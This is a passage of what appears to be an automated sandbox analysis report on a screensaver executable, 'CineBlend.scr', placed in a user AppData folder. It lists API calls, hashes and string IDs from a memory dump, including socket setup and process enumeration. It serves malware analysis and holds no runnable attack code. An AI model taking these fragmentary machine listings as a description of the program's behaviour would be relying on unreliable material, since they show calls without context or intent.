                                          • Instruction ID: 9960929bf1f614c1b5bcefa463b359143218eb28d108ecb27a8bf1b401279857
                                          • Opcode Fuzzy Hash: 828222ef6b08234bb664796eaf79b68ed7aa6535dd202147cf6cf2722d082dc4
                                          • Instruction Fuzzy Hash: F4411A72900218AEDB10DBA4CD81EDEBBF8EF46700F0040A5FA95B7181DA706F85DB60
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr,00000104), ref: 00B71AD9
                                          • _free.LIBCMT ref: 00B71BA4
                                          • _free.LIBCMT ref: 00B71BAE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _free$FileModuleName
                                          • String ID: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr
                                          • API String ID: 2506810119-2343814001
                                          • Opcode ID: 892a25007b1fa284854cbfb3d185d76237f1c30aeff2725d2621d182bc98ca99
                                          • Instruction ID: b5fa37c45cf72ead46ffe3cc7491e0a4e9f2a261151d994b887a84546aaccc21
                                          • Opcode Fuzzy Hash: 892a25007b1fa284854cbfb3d185d76237f1c30aeff2725d2621d182bc98ca99
                                          • Instruction Fuzzy Hash: C3316271A04218AFCB21DF9DDC85D9EBBFCEB85710B10C5E6E82897311E6708E40DBA0
                                          APIs
                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00BACBB1
                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00BACBF7
                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C129C0,00C970E0), ref: 00BACC40
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Menu$Delete$InfoItem
                                          • String ID: 0
                                          • API String ID: 135850232-4108050209
                                          • Opcode ID: 157b395c811b080768762a56af5aa36cd15d34a98fd051974a877b52d54905f3
                                          • Instruction ID: bf3806b343140b7ecbe0abc1d25fd7ee4dc377c7ebd406b549ba1b7fb160c2d9
                                          • Opcode Fuzzy Hash: 157b395c811b080768762a56af5aa36cd15d34a98fd051974a877b52d54905f3
                                          • Instruction Fuzzy Hash: E041A4712083019FD720DF28D985B5ABFE4EF86724F14469DF5A597291EB30E904CBA2
                                          APIs
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00BDDCD0,00000000,?,?,?,?), ref: 00BD4F48
                                          • GetWindowLongW.USER32 ref: 00BD4F65
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BD4F75
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$Long
                                          • String ID: SysTreeView32
                                          • API String ID: 847901565-1698111956
                                          • Opcode ID: 16722bc3088388edab9b92dd4808884ffd3d0894cc0e379ba7ff0ee75effb24b
                                          • Instruction ID: d03786221cb8bfc690bd71a365a25bd0274045081ac2ccb8320ea99c7d0b2fce
                                          • Opcode Fuzzy Hash: 16722bc3088388edab9b92dd4808884ffd3d0894cc0e379ba7ff0ee75effb24b
                                          • Instruction Fuzzy Hash: E3318131114205AFDB258F78CC45BDABBE9EB08334F244766F979922E0E770EC509750
                                          APIs
                                            • Part of subcall function 00BC3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00BC3AD4,?,?), ref: 00BC3DD5
                                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00BC3AD7
                                          • _wcslen.LIBCMT ref: 00BC3AF8
                                          • htons.WSOCK32(00000000,?,?,00000000), ref: 00BC3B63
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                          • String ID: 255.255.255.255
                                          • API String ID: 946324512-2422070025
                                          • Opcode ID: c4c0073f3faec5a7566464d17a97c58b57cd4d611f293fbfdb88a45215c58acf
                                          • Instruction ID: 5fdb06ef4766793ed70f363cc605163b19c3104abb593b66a12da6554ff394cc
                                          • Opcode Fuzzy Hash: c4c0073f3faec5a7566464d17a97c58b57cd4d611f293fbfdb88a45215c58acf
                                          • Instruction Fuzzy Hash: 7E318E356002019FCB10CF68C5C5F69B7E1EF15718FA4C19DE8168B292D732EE46CB60
                                          APIs
                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BD49DC
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BD49F0
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BD4A14
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: SysMonthCal32
                                          • API String ID: 2326795674-1439706946
                                          • Opcode ID: 0f0de1d731180b4c1f00a6fe0d4b3944d425c755108316e21c791c770c2dc852
                                          • Instruction ID: 95aa86999cfa053072f003d2b7b9a0c4a0c3b407861e3dd840d04bbd78762fc2
                                          • Opcode Fuzzy Hash: 0f0de1d731180b4c1f00a6fe0d4b3944d425c755108316e21c791c770c2dc852
                                          • Instruction Fuzzy Hash: 1D21EF32600219AFDF118F90CC82FEB7BA9EF48714F110255FA556B1D0EBB5A851DB90
                                          APIs
                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BD51A3
                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BD51B1
                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BD51B8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend$DestroyWindow
                                          • String ID: msctls_updown32
                                          • API String ID: 4014797782-2298589950
                                          • Opcode ID: 92fcb9a72994785bc2e554d6a9e4f378944074c7eaa60a27b7bb45ab9295f1e0
                                          • Instruction ID: d66a6c2a0c0b8d3561daa81dd518f0f295422b82c8ff9efebbe9b417d8702fa3
                                          • Opcode Fuzzy Hash: 92fcb9a72994785bc2e554d6a9e4f378944074c7eaa60a27b7bb45ab9295f1e0
                                          • Instruction Fuzzy Hash: B82160B5601609AFDB10DF68DC91EBB77EDEB5A764B04019AF9009B361DB70EC11CBA0
                                          APIs
                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BD42DC
                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BD42EC
                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BD4312
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend$MoveWindow
                                          • String ID: Listbox
                                          • API String ID: 3315199576-2633736733
                                          • Opcode ID: 011dbdd71e0c596641995e742674f37d17b0f5475e1e103e28b2fea26d657b9a
                                          • Instruction ID: 7ff83c802281ccac9952d8a26a43bce8ae70c8e743f73a172e0a0b0b53518f10
                                          • Opcode Fuzzy Hash: 011dbdd71e0c596641995e742674f37d17b0f5475e1e103e28b2fea26d657b9a
                                          • Instruction Fuzzy Hash: B921B032610118BBEF118F94CC84FAB77AEEB89764F118166F9409B290DB719C5187A0
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00BB544D
                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00BB54A1
                                          • SetErrorMode.KERNEL32(00000000,?,?,00BDDCD0), ref: 00BB5515
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume
                                          • String ID: %lu
                                          • API String ID: 2507767853-685833217
                                          • Opcode ID: e052419ec564bf0f9571a30d0a23f15458f5e3595371bedbb7715350c537b130
                                          • Instruction ID: e6919af19650894e8d839b88c04a7981e2902a76a321d00c2c25528546d4445b
                                          • Opcode Fuzzy Hash: e052419ec564bf0f9571a30d0a23f15458f5e3595371bedbb7715350c537b130
                                          • Instruction Fuzzy Hash: 8A314F70A00209AFDB10DF64C885EAAB7F8EF05304F1440E9E949DB362DB71EE45DB61
                                          APIs
                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BD4CED
                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BD4D02
                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BD4D0F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: msctls_trackbar32
                                          • API String ID: 3850602802-1010561917
                                          • Opcode ID: 2af90b52c3a6b281cbcb401543a5a3985e3a77aacd88f506ad227f22d95be1f8
                                          • Instruction ID: dc86d1199ab62885af592571e1336d6be8b297d62714ba852843ba6dbb4c519b
                                          • Opcode Fuzzy Hash: 2af90b52c3a6b281cbcb401543a5a3985e3a77aacd88f506ad227f22d95be1f8
                                          • Instruction Fuzzy Hash: 95112331240208BFEF205E65CC46FAB77E9EF85B24F110126FA50E21A0E671DC10DB20
                                          APIs
                                            • Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A
                                            • Part of subcall function 00BA36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00BA3712
                                            • Part of subcall function 00BA36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BA3723
                                            • Part of subcall function 00BA36F4: GetCurrentThreadId.KERNEL32 ref: 00BA372A
                                            • Part of subcall function 00BA36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00BA3731
                                          • GetFocus.USER32 ref: 00BA38C4
                                            • Part of subcall function 00BA373B: GetParent.USER32(00000000), ref: 00BA3746
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00BA390F
                                          • EnumChildWindows.USER32(?,00BA3987), ref: 00BA3937
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                          • String ID: %s%d
                                          • API String ID: 1272988791-1110647743
                                          • Opcode ID: 6408490b8693d7bd7f0ea65d9b76d96724328a3e88ceea5a0dbf9beb2c605438
                                          • Instruction ID: 1fac5132c1205d0b3fa9b11c535cbdbc92d6c75192cd93dd0a594d8ebfc8bc8d
                                          • Opcode Fuzzy Hash: 6408490b8693d7bd7f0ea65d9b76d96724328a3e88ceea5a0dbf9beb2c605438
                                          • Instruction Fuzzy Hash: B311D2716042056BCF01BF748C86AEEB7EAAF95700F0480B5B9499B292DF719A09DB60
                                          APIs
                                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00BD6360
                                          • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00BD638D
                                          • DrawMenuBar.USER32(?), ref: 00BD639C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Menu$InfoItem$Draw
                                          • String ID: 0
                                          • API String ID: 3227129158-4108050209
                                          • Opcode ID: 9d645690e97b4166e5645bc28ee6e98f875da58d8b6bc7c8271a155d226d26bd
                                          • Instruction ID: 0e96efe191aea541892c48a65b2c2ef5b2e63b6b3f6c20ab78ec51ca746d919c
                                          • Opcode Fuzzy Hash: 9d645690e97b4166e5645bc28ee6e98f875da58d8b6bc7c8271a155d226d26bd
                                          • Instruction Fuzzy Hash: BC016D31514218AFDB219F15DC84BAEBBF8FB45365F1480DAF849D6250EF308A85EF21
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8a4abedfb4193ecd9a9934f25d77bfe310f775095a9652fc5f4d80fbd187edc9
                                          • Instruction ID: 339bae80baf2a39a9d6dbeaecf505ce46e8430bba77c57a374470c2f5ade5e63
                                          • Opcode Fuzzy Hash: 8a4abedfb4193ecd9a9934f25d77bfe310f775095a9652fc5f4d80fbd187edc9
                                          • Instruction Fuzzy Hash: 64C15775A1420AEFCB04DFA4C894AAEB7F5FF49714F208598E406EB251D731EE81CB90
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: __alldvrm$_strrchr
                                          • String ID:
                                          • API String ID: 1036877536-0
                                          • Opcode ID: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
                                          • Instruction ID: 5cefe833d24a6e72a9d50577a787dbee8b3be7834a407e5583a13ef2de99c2d4
                                          • Opcode Fuzzy Hash: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
                                          • Instruction Fuzzy Hash: 18A14672A043869FEB11DF18C8917AEBBE5EF11311F2581E9E5BD9B382C7388941CB54
                                          APIs
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00BE0BD4,?), ref: 00BA0EE0
                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00BE0BD4,?), ref: 00BA0EF8
                                          • CLSIDFromProgID.OLE32(?,?,00000000,00BDDCE0,000000FF,?,00000000,00000800,00000000,?,00BE0BD4,?), ref: 00BA0F1D
                                          • _memcmp.LIBVCRUNTIME ref: 00BA0F3E
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: FromProg$FreeTask_memcmp
                                          • String ID:
                                          • API String ID: 314563124-0
                                          • Opcode ID: be7685c71c7d4ed91109fc42bb381e538b6b61b164d0cf824fb5c5abf2680728
                                          • Instruction ID: 04f339dc88fb476adc5d97ba56051bb011a17a4b8079499a5c1e364f1aec5a5f
                                          • Opcode Fuzzy Hash: be7685c71c7d4ed91109fc42bb381e538b6b61b164d0cf824fb5c5abf2680728
                                          • Instruction Fuzzy Hash: C4811771A10109EFCB14EF94C984EEEB7F9FF89315F204598E506AB250DB71AE06DB60
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00BCB10C
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00BCB11A
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                          • Process32NextW.KERNEL32(00000000,?), ref: 00BCB1FC
                                          • CloseHandle.KERNEL32(00000000), ref: 00BCB20B
                                            • Part of subcall function 00B5E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00B84D73,?), ref: 00B5E395
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                          • String ID:
                                          • API String ID: 1991900642-0
                                          • Opcode ID: e45a8310d198e2fadeea06fc1a22c64eb9c0d7c2bd67d3ab8b66cbc6eeca0b03
                                          • Instruction ID: a1861c2a5b9abb937dd1c209de26bbcef93801c65dc6e97c11d1a97f4020130c
                                          • Opcode Fuzzy Hash: e45a8310d198e2fadeea06fc1a22c64eb9c0d7c2bd67d3ab8b66cbc6eeca0b03
                                          • Instruction Fuzzy Hash: 5251E5B1908300AFD710EF24C886E6BBBE8FF89754F4049ADF59597251EB71DA04CB92
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: da0188e520c540e260eac0ae466eabe29a1cb1d9134bd51463dc517a1de3c0e6
                                          • Instruction ID: 944dee93e55978843803f64e0d9b3ac51f12b5661bf51a41e6821f3092ebddf1
                                          • Opcode Fuzzy Hash: da0188e520c540e260eac0ae466eabe29a1cb1d9134bd51463dc517a1de3c0e6
                                          • Instruction Fuzzy Hash: BA41F976A02101AADB257EBD9C83A7E36ECEF45730F144AE5F428D61B1DB354C42C761
                                          APIs
                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00BC255A
                                          • WSAGetLastError.WSOCK32 ref: 00BC2568
                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00BC25E7
                                          • WSAGetLastError.WSOCK32 ref: 00BC25F1
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ErrorLast$socket
                                          • String ID:
                                          • API String ID: 1881357543-0
                                          • Opcode ID: 7c46fa074ca2637b91e6d119ddc3d68dbc732ea8709d137ab7882f3f6986a739
                                          • Instruction ID: 445f6e1e4fb809dc3c79600335d7dbcf674e1a3c3b831c13a2d81b198fed05ef
